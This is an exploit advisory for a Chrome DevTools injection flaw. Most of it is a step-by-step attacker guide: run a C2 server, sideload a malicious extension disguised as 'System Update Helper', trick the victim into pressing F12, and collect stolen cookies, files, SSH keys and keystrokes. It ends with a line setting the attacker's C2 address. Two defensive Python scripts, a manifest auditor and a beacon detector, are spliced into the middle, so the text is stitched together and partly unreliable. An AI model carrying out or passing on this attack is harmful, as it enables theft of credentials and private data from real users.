=============================================================================================================================================
| # Title     : Google Chrome 145.0.7632.117 High-Severity DevTools Injection Vulnerability |
| # Author    : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor    : https://www.google.com |
=============================================================================================================================================

[+] Summary :

A high-severity vulnerability was identified in the DevTools component of Google Chrome versions prior to 145.0.7632.117. The issue stems from an inappropriate implementation that allowed insufficient isolation between Chrome extensions and privileged DevTools pages. If a user was convinced to install a malicious browser extension, the extension could exploit this flaw to inject arbitrary scripts or HTML into a privileged DevTools page, exposing sensitive information accessible within that privileged context.

The vulnerability does not allow remote exploitation without user interaction and does not directly result in a sandbox escape or operating system compromise. However, because of the privileged nature of DevTools pages, the impact was rated High by the Google security team.

[+] POC :

How does this scenario work? ===> https://youtu.be/oFLvPWdp4X4

1. The malicious extension is installed.
2. The extension opens a phishing.html page and prompts the user to open DevTools, claiming there is an error message.
3. When DevTools is opened, the malicious code (payload) executes within the page context, allowing data theft or communication with the host.

Ideas - Add-on permissions :

For these codes to work, the add-on must request permissions such as "tabs", "devtools", and "" in the manifest.json file.
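The permission set named above is what a reviewer or administrator should look for when vetting an unpacked extension before it is trusted. The following Python script is an added defensive example, not code from the advisory or from the indoushka/chromium repository: it audits a manifest.json for that combination (a DevTools page plus "tabs"/"devtools", cookie access and all-site host access). "tabs" and "devtools" are the names the advisory gives; "cookies", "scripting", "webRequest", the broad host patterns and the devtools.html file name are my assumptions about what the described cookie theft and page tracking would additionally require.

```python
import json

# Permissions that, taken together, match the capability set the advisory
# describes. "tabs" and "devtools" come from the advisory; the rest are
# assumptions (cookie theft needs "cookies", cross-site tracking needs broad
# host access, script injection commonly needs "scripting" or "webRequest").
RISKY_PERMISSIONS = {"tabs", "devtools", "cookies", "scripting", "webRequest"}
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def audit_manifest(manifest: dict) -> dict:
    """Return findings and a coarse risk rating for one manifest (MV2 or MV3)."""
    perms = set(manifest.get("permissions", []))
    # MV2 lists host patterns under "permissions"; MV3 uses "host_permissions".
    hosts = set(manifest.get("host_permissions", []))
    hosts |= {p for p in perms if "://" in p or p == "<all_urls>"}
    findings = []

    risky = sorted(perms & RISKY_PERMISSIONS)
    if risky:
        findings.append(f"requests sensitive permissions: {', '.join(risky)}")
    broad = sorted(hosts & BROAD_HOST_PATTERNS)
    if broad:
        findings.append(f"requests access to every site: {', '.join(broad)}")
    if "devtools_page" in manifest:
        # A devtools_page runs inside DevTools itself; combined with the
        # findings above it matches the privileged-page path in the advisory.
        findings.append(f"registers a DevTools page: {manifest['devtools_page']}")

    risk = "high" if len(findings) >= 3 else "medium" if findings else "low"
    return {"name": manifest.get("name", "<unnamed>"), "risk": risk, "findings": findings}


def audit_manifest_text(text: str) -> dict:
    """Parse raw manifest.json content and audit it."""
    return audit_manifest(json.loads(text))


# Constructed sample resembling the "System Update Helper" extension named in
# the advisory; the file names and exact permission list are assumptions.
SUSPICIOUS_MANIFEST = {
    "manifest_version": 3,
    "name": "System Update Helper",
    "version": "1.0",
    "permissions": ["tabs", "devtools", "cookies"],
    "host_permissions": ["<all_urls>"],
    "devtools_page": "devtools.html",
    "background": {"service_worker": "background.js"},
}

# Constructed benign sample for comparison.
BENIGN_MANIFEST = {
    "manifest_version": 3,
    "name": "Tab Counter",
    "version": "0.1",
    "permissions": ["storage"],
    "action": {"default_popup": "popup.html"},
}

if __name__ == "__main__":
    for m in (SUSPICIOUS_MANIFEST, BENIGN_MANIFEST):
        report = audit_manifest(m)
        print(f"{report['name']}: {report['risk']}")
        for finding in report["findings"]:
            print("  -", finding)
```

Run it against the manifest.json of any folder loaded through "Load unpacked" (chrome://extensions lists the folder path for each unpacked extension); a "high" result does not prove malice, but it is exactly the profile that deserves a manual read of background.js before the extension stays installed.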
[+] Step 1: Server Setup (Attacker Side)

1.1 Install Requirements :

    pip install flask flask-cors

1.2 Run the Server

    download : https://github.com/indoushka/chromium/
    =====> cd chromium
    ========> python sever-C2.py

Expected Output:

    C2 Server running on http://0.0.0.0:8080
    Dashboard: http://localhost:8080/dashboard

[+] Step 2: Extension Installation (Victim Side)

2.1 Prepare Extension Files

Place all files in a single folder (e.g., chromium/extension/).

2.2 Install the Extension in Chrome

1. Open chrome://extensions.
2. Enable Developer mode (toggle in the top right).
3. Click Load unpacked.
4. Select the folder containing the extension files.

Installation Confirmation: The extension should appear in the list named "System Update Helper".

[+] Step 3: How the Exploit Works

3.1 Automatic Data Collection (No Victim Interaction)

Once the extension is installed, it automatically begins:

    Function             Timing              Result
    Cookie Theft         Upon installation   Cookies are sent to the server
    Extension Discovery  Upon installation   List of installed extensions is sent
    Page Tracking        During browsing     Every page the victim visits is logged
    Heartbeat            Every minute        Confirms the extension is still active

3.2 Exploiting Privileged Pages (Requires Victim Interaction)

When the victim opens a privileged page such as chrome://settings or chrome://downloads, a red message appears requesting the user to open DevTools:

    Page Error - Press F12 to open Developer Tools and fix the issue

If the victim presses F12, the exploit code executes and automatic file theft begins:

    C:/Windows/System32/drivers/etc/hosts
    C:/Users/Public/Documents/passwords.txt
    SSH files and system keys.

3.3 Keylogging

When the victim types in any password field:

    Plaintext Keylogger installed
    Key logged: a
    Key logged: b...

Every keystroke is sent to the server immediately.
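Of the collection behaviour listed in Step 3, the heartbeat (one request per minute to the C2) is the part that stands out most clearly on the network, because user-driven browsing does not produce fixed intervals. The following Python is an added detection example, not code from the advisory or its repository: it reads constructed proxy log lines and flags any client/host pair contacted at a near-constant interval. The log format, the /heartbeat path and the example.com traffic are my assumptions; 192.168.1.100:8080 is the C2 address the advisory itself uses.

```python
import statistics
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Constructed proxy log excerpt, one request per line:
#   "<ISO timestamp> <client ip> <method> <url>"
# The beacon lines use the advisory's C2 address; the /heartbeat path and the
# interleaved normal browsing are assumptions for the sake of the example.
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.5 POST http://192.168.1.100:8080/heartbeat
2024-05-01T10:00:07 10.0.0.5 GET https://example.com/
2024-05-01T10:01:00 10.0.0.5 POST http://192.168.1.100:8080/heartbeat
2024-05-01T10:01:41 10.0.0.5 GET https://example.com/news
2024-05-01T10:02:00 10.0.0.5 POST http://192.168.1.100:8080/heartbeat
2024-05-01T10:02:05 10.0.0.5 GET https://example.com/about
2024-05-01T10:03:00 10.0.0.5 POST http://192.168.1.100:8080/heartbeat
2024-05-01T10:03:12 10.0.0.5 GET https://example.com/contact
2024-05-01T10:04:00 10.0.0.5 POST http://192.168.1.100:8080/heartbeat
"""


def parse_log(text):
    """Yield (timestamp, client, host:port) for each well-formed line."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip blank or malformed lines instead of crashing
        ts, client, _method, url = parts
        yield datetime.fromisoformat(ts), client, urlsplit(url).netloc


def detect_beacons(text, min_hits=4, max_jitter=5.0):
    """Flag (client, host) pairs contacted at near-constant intervals.

    A heartbeat that fires every minute produces inter-request gaps with
    almost no spread; max_jitter is the allowed population std-dev of those
    gaps in seconds. Ordinary browsing (example.com above) has large spread.
    """
    seen = defaultdict(list)
    for ts, client, host in parse_log(text):
        seen[(client, host)].append(ts)

    hits = []
    for (client, host), times in seen.items():
        if len(times) < min_hits:
            continue  # too few requests to call the timing periodic
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if statistics.pstdev(gaps) <= max_jitter:
            hits.append({
                "client": client,
                "host": host,
                "hits": len(times),
                "period_s": statistics.median(gaps),
            })
    return hits


if __name__ == "__main__":
    for beacon in detect_beacons(SAMPLE_LOG):
        print(f"{beacon['client']} -> {beacon['host']}: "
              f"{beacon['hits']} requests every ~{beacon['period_s']:.0f}s")
```

On real proxy or firewall exports the same logic applies after swapping parse_log for the export's field layout; a hit pointing at a non-standard port such as 8080 on an internal or unknown host is the signal to pull the client's extension list, which is the other artifact this advisory leaves behind.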
[+] Step 4: Monitoring Stolen Data (Attacker Side)

4.1 Open the Control Panel

In the browser, open: http://localhost:8080/dashboard

4.2 Reading the Data

    Section      What you see
    Pages        All pages visited by the victim
    Cookies      Stolen cookies (including tokens)
    Files        Files stolen from the victim's device
    Keys         Keystrokes (passwords)
    Extensions   Other installed extensions

4.3 Saved Files

    collected.json   : All data in JSON format.
    stored_*.txt     : Stolen files.
    keystrokes.log   : Keystroke log.
    passwords.txt    : Extracted passwords.

[+] Practical Usage Scenarios

Scenario 1: Testing on a Single Device

    [Your Device] <- Acts as both attacker and victim

1. Run the server: python sever-C2.py
2. Install the extension on the same device.
3. Open the dashboard: http://localhost:8080
4. Browse normal sites and chrome:// pages.

[+] Scenario 2: Real Attack (Two Devices)

    Victim Device             Attacker Device
    Installs the extension    Runs the server on a real IP
    Opens chrome://settings   IP: 192.168.1.100:8080
    Presses F12               Opens the dashboard
    Files are stolen          Sees data instantly

Minor Adjustment: Change the C2 address in background.js to the attacker's IP :

    const C2 = 'http://192.168.1.100:8080'; // The attacker's real IP

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx) |
============================================================================================